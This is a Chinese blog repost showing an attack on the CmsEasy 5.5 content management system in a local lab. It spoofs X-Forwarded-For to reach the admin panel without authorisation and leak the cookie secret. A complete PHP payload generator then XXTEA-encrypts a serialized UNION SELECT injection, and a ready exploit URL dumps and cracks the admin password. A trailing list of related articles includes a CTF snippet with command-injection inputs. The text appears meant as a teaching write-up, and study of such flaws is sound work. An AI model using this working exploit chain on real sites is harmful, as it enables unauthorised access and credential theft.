Cmseasy_5.5的SQL注入

news2024/12/23 20:58:20

未授权访问进入后台获取Cookie安全码

在cmseasy目录下的lib/admin/admin.php中有这么一句代码,可以让我们实现未授权访问进入到cmseasy的后台获取Cookie安全码,为我们后期的注入做准备。

if($servip==front::ip()&&front::get('ishtml')==1) return;

这句代码的意思是,当servip与客户的ip相等的时候以及ishtml=1时,可以不需要检查你是否为admin,直接进入到后台。

如何进入到后台

根据代码分析,满足上述的两个条件就可未授权进入后天,ishtml可以直接在网址栏中写inhtml=1;那么IP呢?我们自己的IP肯定跟服务器的IP不一样,那么我们怎么让我们的IP一样呢,这就要看IP的获取方法了。

这就是获取IP的方法,其中HTTP_X_FORWARDED_FOR这个是可以进行伪造的,这就好办了。

我用的是Firefox浏览器,有一个插件的名字是上图这个,它可以实现伪造IP,如何获取服务器的IP就太简单了,ping也可以,nslookup也可以,我是在自己的主机上搭建的,所以就填写127.0.0.1。

这样就满足了上述的两个条件,就可以实现未授权访问后台。

http://127.0.0.1/cmseasy/index.php?case=config&act=system&admin_dir=admin&site=default&ishtml=1

在网址栏中输入以上代码,就可进入后台。

这样就拿到了cookie安全码。

SQL注入获取管理员账号密码

在admin_act.php中有这样一个函数,remotelogin_action(),其中有这么两行代码。

 $args = xxtea_decrypt(base64_decode(front::$args), config::get('cookie_password'));
 $user=$user->getrow(unserialize($args));

这对args和拿出来的Cookie安全码进行了base64得解码,再进行解密,再进行反序列化;本来这个Cookie安全码是登录之后才能获得的,现在通过未授权登录到后台已经提前拿到了,那我们接下来所需要做的就是与其相反的步骤,它解码那我就编码,根据顺序就是序列化、加密、base64编码。

那么我们首先就是需要把上述需要用到的函数找到,将拿到的cookie安全码输入进去。

<?php

$args = 'ad1efdac86de472006ea67971f0d7b14';

$table = array(
    'userid`=-1 union select 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from cmseasy_user limit 0,1#'=>1
);

echo base64_encode(xxtea_encrypt(serialize($table),$args));

function xxtea_encrypt($str, $key) {
    if ($str == "") {
        return "";
    }
    $v = str2long($str, true);
    $k = str2long($key, false);
    if (count($k) < 4) {
        for ($i = count($k); $i < 4; $i++) {
            $k[$i] = 0;
        }
    }
    $n = count($v) - 1;

    $z = $v[$n];
    $y = $v[0];
    $delta = 0x9E3779B9;
    $q = floor(6 + 52 / ($n + 1));
    $sum = 0;
    while (0 < $q--) {
        $sum = int32($sum + $delta);
        $e = $sum >> 2 & 3;
        for ($p = 0; $p < $n; $p++) {
            $y = $v[$p + 1];
            $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
            $z = $v[$p] = int32($v[$p] + $mx);
        }
        $y = $v[0];
        $mx = int32((($z >> 5 & 0x07ffffff) ^ $y << 2) + (($y >> 3 & 0x1fffffff) ^ $z << 4)) ^ int32(($sum ^ $y) + ($k[$p & 3 ^ $e] ^ $z));
        $z = $v[$n] = int32($v[$n] + $mx);
    }
    return long2str($v, false);
}

function long2str($v, $w) {
    $len = count($v);
    $n = ($len - 1) << 2;
    if ($w) {
        $m = $v[$len - 1];
        if (($m < $n - 3) || ($m > $n)) return false;
        $n = $m;
    }
    $s = array();
    for ($i = 0; $i < $len; $i++) {
        $s[$i] = pack("V", $v[$i]);
    }
    if ($w) {
        return substr(join('', $s), 0, $n);
    }
    else {
        return join('', $s);
    }
}

function str2long($s, $w) {
    $v = unpack("V*", $s. str_repeat("\0", (4 - strlen($s) % 4) & 3));
    $v = array_values($v);
    if ($w) {
        $v[count($v)] = strlen($s);
    }
    return $v;
}

function int32($n) {
    while ($n >= 2147483648) $n -= 4294967296;
    while ($n <= -2147483649) $n += 4294967296;
    return (int)$n;
}

这就是需要的代码。

最后得出这么一个结果,再将它输入进输入框之前需要把符号进行url编码,/-->%2f,+-->%2b。

http://127.0.0.1/cmseasy/index.php?case=admin&act=remotelogin&admin_dir=admin&site=default&args=WlkeL4Ctx6knDmOBj9rKc%2bBM2KaIdvkCrIu08TQiyBjdlH3znVEVRuwtIXXQyzRIPEP5xUCyIa6Rl88p3FbDC%2fQj0ST6W68Js4grleUZC4EEzAWPV3IbDzGyuquG%2f5Qj9QjVs3lWiLcoKdgxR6t%2fhijq39OTtf4HlsvM9Ldn8ZCM8rwJlAFyCQ5%2fD6jTGauhNZP2BfZhEgN7lGIe

输入以上代码后查看登录情况。

从这儿可以看出账号为admin,而密码是被md5加密过的一串密文,3Ae10adc3949ba59abbe56e057f20f883e,我们用MD5工具解密。

最后得到密码为123456

验证:

成功!!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1995848.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

python连接MySQL数据库使用pymysql

开头 经过这么一段时间的学生信息管理系统的摸爬滚打&#xff0c;不断的学习更新的知识&#xff0c;不断修改自己的认知&#xff0c;针对pymysql以及MySQL数据库的知识做个总结&#xff0c;以纪念我这段时间的学习。 目录 开头 pymysql的使用流程 1.导入pymysql的工具包 方…

TB6612FNG电机驱动连线图

TB6612FNG电机驱动连线图 原理图: 实物对应图: 面包板连线图:

多线程更新最大值

背景 有一张图像&#xff0c;很大&#xff0c;假设10000x10000&#xff0c;需要找其中的最大值和最小值&#xff0c;可以使用opencv的cv::minMaxLoc&#xff0c;但是对于这样的大图来说太慢了。可以多线程并行找。 方法 参考&#xff1a;How to atomically update a maximum…

【practise】电话号码的字母组合

关于我&#xff1a; 睡觉待开机&#xff1a;个人主页 个人专栏: 《优选算法》《C语言》《CPP》 生活的理想&#xff0c;就是为了理想的生活! 作者留言 PDF版免费提供&#xff1a;倘若有需要&#xff0c;想拿我写的博客进行学习和交流&#xff0c;可以私信我将免费提供PDF版。…

【秋招突围】2024届校招-米哈游笔试题-第二套

🍭 大家好这里是 春秋招笔试突围,一起备战大厂笔试 💻 ACM金牌团队🏅️ | 多次AK大厂笔试 | 编程一对一辅导 ✨ 本系列打算持续跟新 春秋招笔试题 👏 感谢大家的订阅➕ 和 喜欢💗 和 手里的小花花🌸 ✨ 笔试合集传送们 -> 🧷春秋招笔试合集 🌰 明晚又有米…

Ubuntu安装MySQL5.7 + Apache + PHP + 禅道 保姆及教程

目录 开始安装MySQL 5.7 1、获取安装包 2、解压到指定位置 安装MySQL 启动MySQL 进入到MySQL进行测试 设置允许所有IP可以连接 配置允许远程连接 和 开启 gtid 和 binlog 日志&#xff08;这一步如果不需要可以不操作 如果只需要配置允许远程连接只添加bind-address 0…

【日记】看完黑神话悟空最终预告后的另一种担忧(538 字)

正文 上午我都不知道黑神话发新预告了。看完之后整个人快要爆炸了。草。这是爆了多少新东西出来。这又引起了我另一个担忧&#xff1a;目前已经透露出来的内容&#xff0c;会不会已经占到了游戏体量的一半甚至大半&#xff1f;目前来说&#xff0c;美术、音乐、动作都没什么大问…

动态规划之——背包DP(完结篇)

文章目录 概要说明分组背包模板例题1思路code模板例题2思路code 有依赖的背包问题模板例题思路code 背包问题求方案数模板例题思路code 背包问题求具体方案模板例题思路code 概要说明 本文讲分组背包、有依赖的背包、 背包问题求方案数以及背包问题求具体方案 入门篇(01背包和…

JavaEE 第7节 线程饥饿及其解决办法

目录 一、什么是线程饥饿&#xff1f; 二、线程饥饿的解决办法 *wait()与notify()方法解决线程饥饿 1、wait(等待) 2、notify(通知) 1&#xff09;notify 2&#xff09;notifyAll 3&#xff09;关于wait方法的一些补充 1、wait的方法的三个功能是原子性的&#xff1a;…

力扣刷题-环形链表判断是否有环

&#x1f308;个人主页&#xff1a;羽晨同学 &#x1f4ab;个人格言:“成为自己未来的主人~” 首先&#xff0c;我们先来看一下这段代码&#xff1a; /*** Definition for singly-linked list.* struct ListNode {* int val;* struct ListNode *next;* };*/ bool …

【RISC-V设计-10】- RISC-V处理器设计K0A之IDU

【RISC-V设计-10】- RISC-V处理器设计K0A之IDU 文章目录 【RISC-V设计-10】- RISC-V处理器设计K0A之IDU1.简介2.顶层设计3.端口说明4.代码设计5.总结 1.简介 指令译码单元&#xff08;Instruction Decoder Unit&#xff0c;简称IDU&#xff09;是CPU中的一个关键组件&#xff…

用Vue和Axios将数据库数据显示在前端页面

在本次实例中Vue只用在了前端部分&#xff0c;Axios用于向后端请求数据&#xff0c;我们这里要用到Ajax技术来访问后端数据。 HTML&#xff1a; <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8"><meta name&quo…

CTF-RCE

eval执行 ?cmdsystemctl("ls"); ?cmdsystemctl("ls /"); ?cmdsystemctl("cat /flag_27523); 命令注入 输入ip试试发先可以执行 127.0.0.1 查看一下看看有社么 127.0.0.1 | ls 试着看看php文件 127.0.0.1 | cat 297581345892.php 貌似这个文件有…

韩式告白土味情话-柯桥生活韩语学习零基础入门教学

你们韩国人别太会告白了&#xff01; 1、너 얼굴에 뭐가 조금 묻었어! 你的脸上有点5376东西&#xff01; 뭐가 조금 묻었1585757는데? 有点什么&#xff1f; 이쁨이 조금 묻었네. 有点漂亮。 2、돌잡이 때 뭐 잡았어요&#xff1f; 你抓周的时候抓了什么&#xff1f; 쌀 잡았…

打开一个页面,整个过程会使用哪些协议?

打开一个页面&#xff0c;整个过程会使用哪些协议? 网络通信模型可以用下图来简单表示&#xff0c;根据下面这个顺序&#xff0c;我们来说明&#xff0c;打开一个页面&#xff0c;整个过程会使用哪些协议? 首先&#xff0c;我们可以梳理一个简单的完整流程: 1.在浏览器中输…

Postman Pre-request Script

这个其实是普通的js脚本&#xff0c;有一些和postman的通信他也提供了一些快捷命令如下 postman常用参数使用 环境变量 //设置当前环境变量 pm.environment.set("key", "value"); //获取当前环境变量 pm.environment.get("key"); //清除当前…

软件测试面试题汇总,超详细整理。。。

测试技术面试题 1、什么是兼容性测试&#xff1f;兼容性测试侧重哪些方面&#xff1f; 参考答案&#xff1a; 兼容测试主要是检查软件在不同的硬件平台、软件平台上是否可以正常的运行&#xff0c;即是通常说的软件的可移植性。 兼容的类型&#xff0c;如果细分的话&#x…

【Windows】如何关闭Windows11安全中心中的“病毒和威胁保护”?

按下“win&#xff08;徽标键&#xff09;i”快捷键&#xff0c;选择隐私与安全性-Windows安全中心。 选择防火墙和网络保护-域保护。 将开关闭&#xff0c;专业网络和公用网络防火墙也同样关闭&#xff0c;如下图所示&#xff1a; 关闭防火墙后&#xff0c;左边菜单栏选…

函数的学习(三)

1.函数的声明和定义 在C语言中&#xff0c;函数的声明和定义是分开的。 函数的声明是指在程序中提前告诉编译器有一个函数存在&#xff0c;并且指定了函数的名称、参数类型和返回值类型。函数的声明一般放在头文件中&#xff0c;它的作用是告诉编译器有一个函数存在&#xff…

学生综合测评、学生测评管理系统的设计与实现

摘要 学生综合测评是学校必不可少的一个部分。在教学中&#xff0c;学生综合测评担负着最重要的角色。为满足如今日益复杂的管理需求&#xff0c;各类学生综合测评也在不断改进。本课题所设计的学生综合测评&#xff0c;使用JSP技术与MySql数据库进行开发&#xff0c;它的优点代…